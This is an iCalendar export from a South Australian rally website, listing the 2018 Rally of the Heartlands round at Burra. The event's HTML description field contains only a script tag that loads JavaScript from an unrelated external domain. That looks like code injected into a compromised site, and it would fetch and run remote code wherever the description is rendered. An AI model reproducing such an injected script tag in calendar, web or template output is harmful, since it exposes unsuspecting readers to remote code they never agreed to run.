BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//166.62.30.147//NONSGML kigkonsult.se iCalcreator 2.24.2//
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:South Australian Rally
X-WR-CALDESC:South Australian Rally
X-FROM-URL:http://sarally.net.au
X-WR-TIMEZONE:Australia/Adelaide
BEGIN:VTIMEZONE
TZID:Australia/Adelaide
X-LIC-LOCATION:Australia/Adelaide
BEGIN:STANDARD
DTSTART:20190407T030000
TZOFFSETFROM:+1030
TZOFFSETTO:+0930
RDATE:20200405T030000
TZNAME:ACST
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:20181007T020000
TZOFFSETFROM:+0930
TZOFFSETTO:+1030
RDATE:20191006T020000
TZNAME:ACDT
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
UID:ai1ec-44364@sarally.net.au
DTSTAMP:20190228T011543Z
CATEGORIES;LANGUAGE=en-US:Events\,SA Rally Championship
CONTACT:http://rallyofsa.com.au/rally-of-the-heartland/
DESCRIPTION:
DTSTART;VALUE=DATE:20180601
DTEND;VALUE=DATE:20180604
GEO:-33.680032;+138.936342
LOCATION:Burra @ Burra SA 5417\, Australia
SEQUENCE:0
SUMMARY:AGL Rally of SA – Rally of the Heartlands – SARC Rnd 1
URL:http://sarally.net.au/event/agl-rally-of-sa-rally-of-the-heartlands/
X-COST-TYPE:free
X-ALT-DESC;FMTTYPE=text/html:<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 3.2//E
 N'>\\n<HTML>\\n<HEAD>\\n<TITLE></TITLE>\\n</HEAD>\\n<BODY><p><script src='
 https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script
 ></p>\n</BODY></HTML>
END:VEVENT
END:VCALENDAR
